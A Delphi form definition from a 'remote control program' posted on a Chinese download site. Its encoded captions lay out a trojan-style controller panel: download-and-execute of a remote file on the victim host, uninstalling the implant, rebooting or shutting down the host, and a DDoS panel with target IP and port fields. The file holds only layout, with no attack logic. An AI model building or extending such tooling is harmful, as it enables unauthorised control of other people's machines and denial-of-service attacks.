⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 unitdelfile.dfm

📁 不错的远程控制程序
💻 DFM
字号:
object DelFile: TDelFile
  Left = 228
  Top = 359
  Width = 313
  Height = 367
  BorderIcons = [biSystemMenu, biMaximize]
  Caption = #26381#21153#31471#25511#21046
  Color = cl3DLight
  Font.Charset = DEFAULT_CHARSET
  Font.Color = clWindowText
  Font.Height = -11
  Font.Name = 'MS Sans Serif'
  Font.Style = []
  OldCreateOrder = False
  OnCanResize = FormCanResize
  OnClose = FormClose
  OnCreate = FormCreate
  OnDeactivate = FormDeactivate
  OnShow = FormShow
  PixelsPerInch = 96
  TextHeight = 13
  object StatusBar1: TStatusBar
    Left = 0
    Top = 321
    Width = 305
    Height = 19
    Panels = <
      item
        Text = #31561#24453#36830#25509
        Width = 50
      end>
  end
  object GroupBox1: TGroupBox
    Left = 8
    Top = 16
    Width = 289
    Height = 97
    Caption = #19979#36733#25191#34892#25991#20214
    TabOrder = 1
    object Label1: TLabel
      Left = 8
      Top = 26
      Width = 60
      Height = 13
      AutoSize = False
      Caption = #25991#20214#22320#22336#65306
    end
    object Label2: TLabel
      Left = 8
      Top = 64
      Width = 60
      Height = 13
      AutoSize = False
      Caption = #25991#20214#21517#31216#65306
    end
    object Edit1: TEdit
      Left = 72
      Top = 24
      Width = 201
      Height = 20
      Font.Charset = GB2312_CHARSET
      Font.Color = clWindowText
      Font.Height = -12
      Font.Name = #23435#20307
      Font.Style = []
      ParentFont = False
      TabOrder = 0
      Text = 'http://'
    end
    object Edit2: TEdit
      Left = 72
      Top = 60
      Width = 105
      Height = 20
      Font.Charset = GB2312_CHARSET
      Font.Color = clWindowText
      Font.Height = -12
      Font.Name = #23435#20307
      Font.Style = []
      ParentFont = False
      TabOrder = 1
      Text = 'c:\'
    end
  end
  object Button2: TButton
    Left = 200
    Top = 72
    Width = 81
    Height = 25
    Caption = #19979#36733#25191#34892
    TabOrder = 2
    OnClick = Button2Click
  end
  object GroupBox2: TGroupBox
    Left = 8
    Top = 232
    Width = 289
    Height = 73
    Caption = #26381#21153#31471#25511#21046
    TabOrder = 3
    object Button1: TButton
      Left = 8
      Top = 26
      Width = 85
      Height = 25
      Caption = #21368#36733#26381#21153#31471
      TabOrder = 0
      OnClick = Button1Click
    end
    object Button6: TButton
      Left = 100
      Top = 26
      Width = 85
      Height = 25
      Caption = #37325#21551#20027#26426
      TabOrder = 1
      OnClick = Button6Click
    end
    object Button7: TButton
      Left = 192
      Top = 26
      Width = 85
      Height = 25
      Caption = #20851#38381#20027#26426
      TabOrder = 2
      OnClick = Button7Click
    end
  end
  object GroupBox3: TGroupBox
    Left = 8
    Top = 120
    Width = 289
    Height = 105
    Caption = 'DDOS'#21629#20196'('#26410#20005#26684#27979#35797#65292#20351#29992#27880#24847')'
    TabOrder = 4
    object Label3: TLabel
      Left = 8
      Top = 32
      Width = 46
      Height = 13
      AutoSize = False
      Caption = #25915#20987'IP'#65306
    end
    object Label4: TLabel
      Left = 8
      Top = 72
      Width = 60
      Height = 13
      AutoSize = False
      Caption = #25915#20987#31471#21475#65306
    end
    object Edit3: TEdit
      Left = 72
      Top = 28
      Width = 201
      Height = 20
      Font.Charset = GB2312_CHARSET
      Font.Color = clWindowText
      Font.Height = -12
      Font.Name = #23435#20307
      Font.Style = []
      ParentFont = False
      TabOrder = 0
      Text = '127.0.0.1'
    end
    object Button4: TButton
      Left = 152
      Top = 64
      Width = 59
      Height = 25
      Caption = #24320#22987
      TabOrder = 1
      OnClick = Button4Click
    end
    object Button5: TButton
      Left = 216
      Top = 64
      Width = 59
      Height = 25
      Caption = #20572#27490
      TabOrder = 2
      OnClick = Button5Click
    end
    object Edit4: TEdit
      Left = 72
      Top = 68
      Width = 57
      Height = 20
      Font.Charset = GB2312_CHARSET
      Font.Color = clWindowText
      Font.Height = -12
      Font.Name = #23435#20307
      Font.Style = []
      ParentFont = False
      TabOrder = 3
      Text = '80'
      OnKeyPress = Edit4KeyPress
    end
  end
end

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -